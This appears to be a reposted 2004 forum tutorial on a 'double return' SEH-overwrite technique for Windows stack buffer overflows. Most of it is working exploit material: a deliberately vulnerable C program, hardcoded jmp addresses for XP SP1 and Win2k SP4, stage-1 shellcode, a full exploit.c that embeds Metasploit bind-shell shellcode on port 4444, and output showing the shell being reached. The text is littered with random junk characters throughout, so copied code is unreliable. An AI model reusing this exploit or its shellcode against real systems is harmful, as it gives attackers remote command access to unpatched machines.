The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well. ) \; R" m9 ?0 @, x0 i+ G7 _4 s/ u
[Buf] <- Shellcode ; `5 U2 y# Z+ s# ^4 L8 _ @( j- ][Return Address] <- jmp register (for Windows XP sp1)/ r# L" B F6 N. e9 N+ A2 l L
[Various Stack Data] <- Junk ' M9 k5 J% ?0 Z, x2 T+ J, r, x- s) g[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward6 a7 v( ^: P3 L
[SE Handler] <- jmp register (for Win2k sp4)1 L: p7 H2 S5 t8 ~, C
[Stage1 Shellcode] <- stage1 shellcode for win2k 8 M: {6 ~* S% R2 H; Q 8 n, l3 p1 |; z0 fIf the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses $ B' p9 F- e j; t8 ~9 V' q) b ! L$ \3 K$ {1 Q4 o7 CNecessary Tools: 9 @7 n4 l3 T' Y& o. f- OllyDBG ' @, G3 C. B% j+ R) G- C/C++ Compiler6 W2 l% y" M2 p9 ?& k
- nasm 6 A& U7 M# p* j+ F8 O _" J- Sac ( D+ @- ~% F% I4 b; V3 D9 T: ^/ O9 b/ S. U, b. U
Vulnerable Code:( r( N: U: z- {0 Z% y" O
//lamebuf.c* V0 ~" E1 U! L) _: v/ x" b0 F
#include<stdio.h>) ^. t; J; C: l! ~4 @
#include<string.h>& H. C! M* x. \ r: D0 S9 [
#include<windows.h> " s0 _! E% p; Y7 i* @" Zint main(int argc,char *argv[]){ # n$ P3 Z, a: I2 i4 _ : L3 p: U% C" }) dchar buf[512];" E& r) M- e0 [% Z
char buf1[1024]; // <- simulate a stack ' r5 o2 Q) j# r) p//DebugBreak();3 K+ \% ^3 N( e4 f0 ]% D1 p4 r
if (argc != 2){ return -1; }6 ^/ Q$ Y# w9 I+ L' H. B5 J0 |
. i; e, K+ [( s) R1 l6 `1 R& ]
strcpy(buf,argv[1]);3 M. z% l0 I% e1 P- S
return 0x0; # A4 o( x) t/ p }) v} 0 s$ G$ I3 f, b9 v5 X7 y U( r% c4 W- o1 o2 _4 U
Getting Started: $ G1 \+ ~- D: i( A8 tBefore writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers: . R7 w" k) U- v2 b2 d _ . \& t, F- u5 J4 x8 _EAX 00000000 # G( C v1 x+ R+ x( {ECX 00321404 9 d) H. t: @" A2 \. N. ]0 U! qEDX 00414141 ) [0 J$ x* y3 CEBX 7FFDF000% h) e3 A1 H$ c% c- B0 o1 B" d
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"7 a4 y8 b, E8 [0 j& E
EBP 41414141# @0 D9 ]3 j @) d: r
ESI 77D4595F' ?( Y) f8 v+ ~1 Q( O$ I8 s0 t, f9 S
EDI 77F59037 ntdll.77F59037 ( s9 A4 F3 K! z! w+ k" s! @% PEIP 41414141% z8 w+ C# t0 ^# g
2 f" S$ ~, J' S t( V% _1 j6 WLets take a look at the stack and see what happened to the default exception handler:0 S) w/ a) c2 S9 c$ y
0x0012FFB0 41414141 Pointer to next SEH Record# p- y* _9 H- c
0x0012FFB4 41414141 SE Handler% q5 Y* H9 J5 N
/ {0 d r% l. J) b9 |We successfully overwrote the return address and the default exception handler. * u. D2 i! D: u# _1 Q8 B$ c. X6 d' y9 a" a) h X0 T5 O6 x
Primary Return Address (Windows XP SP1 EN):6 H7 b" |7 b( h
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be: * E5 F. n" P+ W+ o"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"- i' c, ?' Z+ F# k d: ?
# F) k/ Z, _( O* C3 R+ a( S
Secondary Return Address (Windows 2000 SP4 EN):5 \3 t+ B, d0 ]( t* Q
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:. _( ?* b" h; ]# B q
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"" h2 P0 m0 A5 J6 e( J. R
8 S/ o9 d% f1 R% r- sProof Of Concept: 0 E! \/ U: S! `( X0 x/ }+ {* B// exploit.c / d. Y/ s5 ^" m8 _2 H2 [! |// Tal zeltzer - [Double Return] // " ^* u+ S: M! X" o" N & @. n. f% H$ i3 P#include<stdio.h>& ^3 c: g. q3 G# d1 H- B
#include<string.h> ' H2 n1 P* u( D7 I$ r5 o! W+ L" z#include<windows.h> ' `5 k# G, k9 N. {0 K5 D4 \% K4 I- K2 s: f% p; w
#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp( l) N; H2 H6 j, B$ K
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx0 ~" g; j) p1 o: [8 k6 _8 s) J
+ R2 g; A* N" M// Stage1 For WinXP Sp1 English 3 p5 S# h! I ?% Gunsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";- I2 n$ e- I% y
# y0 j/ r( G4 I" H
// Stage1 For Win2k Sp4 English/ y/ o6 m6 Z3 g1 U1 t5 y
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";- Y9 |" N8 ?8 Y# _
$ h! K) m$ y! a- L ^
// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com ) n+ s( S; }" \$ F% eunsigned char shellcode[] = % m& r3 v5 d! F' G' u% x# q$ v"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"' K$ v% o1 G: `" c7 H, V
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"" N' E0 h& Y4 e; E! l, {5 P4 q, w
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05" ( e* ^$ w# K z/ q: z7 M! h" t"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0" $ z. l2 e2 h! o4 Q8 t& R# L"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74", e& h, V2 L' l' b1 K) [
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15", [9 d$ U# ]( |
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"9 t4 i) ?; Z% ^ T6 _9 j3 f4 |! T @
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53" $ B0 b. W0 V p, Z0 ?8 ?$ y"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"6 G. q4 W3 q3 A# o2 |% F3 W) K
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"1 G- H: y" c+ C3 E( |' }
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"% O/ Y+ C3 G5 f$ n9 q/ y
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" ) A: e; S1 ?% Y" _"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6" ) E1 H$ r; l3 A' A"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16" 6 J. L! w: R( p"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f" + k( w% q; Y. n! A1 }" K/ B$ K"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c" ) e5 R Z3 `8 b6 v% A$ K, d"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" $ L X* k6 V( ^) T }; d$ k6 V"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"9 x7 H- y. Z; }- y. @
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8" * m1 E: O8 u: F6 X5 H. O2 F"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e" 2 A& N( D* d$ W"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f" 0 ?8 e8 D @! z5 z5 O1 x"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27" 8 X7 _/ U) I0 k: x' p6 _"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" 4 u+ G8 g+ G0 [, e ~"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"8 O7 p: `9 v( U( ~+ {2 F+ w
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";2 R6 f. l Q) B' {
8 u0 c) H& f4 d+ H# J( J+ K; f$ Y$ j2 M3 [4 o
int main(int argc,char *argv[]){; Z* ?3 h5 U4 _3 m" ?# t
: o( e T- X1 f7 t/ Uchar *bufExe[3];. b+ }" w$ X: Q1 L, s& W
char buf[2048];( Z/ U( _9 Z9 I9 i0 ]& L; `. t
bufExe[0] = "lamebuf.exe";+ D; g7 W3 n3 `/ k) ?) o- J' K
bufExe[2] = NULL; ) B. ~- `# z3 s9 p7 n& b# [! m: J, t$ m) c4 R$ R7 j/ `; |6 i
memset(buf,0x0,sizeof(buf));: k6 t/ x; i" C+ _" m4 w0 X
memset(buf,0x90,1652); 8 G, G' R! ^1 F3 qmemcpy(&buf[24],shellcode,sizeof(shellcode)-1); - A1 B/ ]; s! j0 |+ a* L$ B, M4 d5 t8 Q: B7 {6 M( x5 l
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode3 n5 M# D0 o9 m7 ^& i# F, }/ q
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode' L, n8 g( ~- A! [- d* M
z6 e0 }, @ x/ C0 a
*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en 5 y8 y" v6 f* N" Y$ p+ c2 Y2 `/ ]*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code ' l$ [; c! Z; }*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en 8 W" |6 R' |$ x. q( x Y* ] , c3 `7 W! Q- A. I. r. h; |! F# n 5 m/ \: j0 s% T$ f0 _bufExe[1] = buf; ; i4 Z2 w- y; t& g6 M: d//Execute the vulnerable application! i. b3 S: D1 ?. Q% p( g5 O
execve(bufExe[0],bufExe,NULL); & p: U& R! H! b. \) D . V, o$ P' M$ U& N" p) d) t: mreturn 0x0;3 o' G1 M$ d4 V; }8 _
} w1 G. Q n6 s! T: m, D3 R0 C
' r7 r$ @* ~6 T, H
Exploit under Windows XP SP1:6 A% ]) o T, U6 n3 k# @" @+ o1 ^* N
C:\>exploit # b. o5 {+ Y# C/ A2 O7 ?- cC:\> : [9 `( N9 b. U: L+ A' D+ T. i7 OC:\>telnet 127.0.0.1 4444 - M' y( ^ y. Y! `, w! s# W% t8 \( O& y# w8 x+ \$ k
Microsoft Windows XP [Version 5.1.2600] 8 e+ I2 J/ m1 ^(C) Copyright 1985-2001 Microsoft Corp.+ S% C2 |( S/ j1 W
$ d$ W4 W# K( s" z7 Z; c3 D) lC:\> & q4 p# F/ i V0 ]4 q' c& s - n4 x" w5 [7 C" n9 BExploit under Windows 2000 SP4: 6 `( F; p$ M. X* ]C:\>exploit , @6 Z1 g( e4 `* l: j6 ~$ dC:\> ) D3 |; X/ A" D$ [8 AC:\>telnet 127.0.0.1 4444( K# t- T3 `5 U1 C* l. ]8 E9 O
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
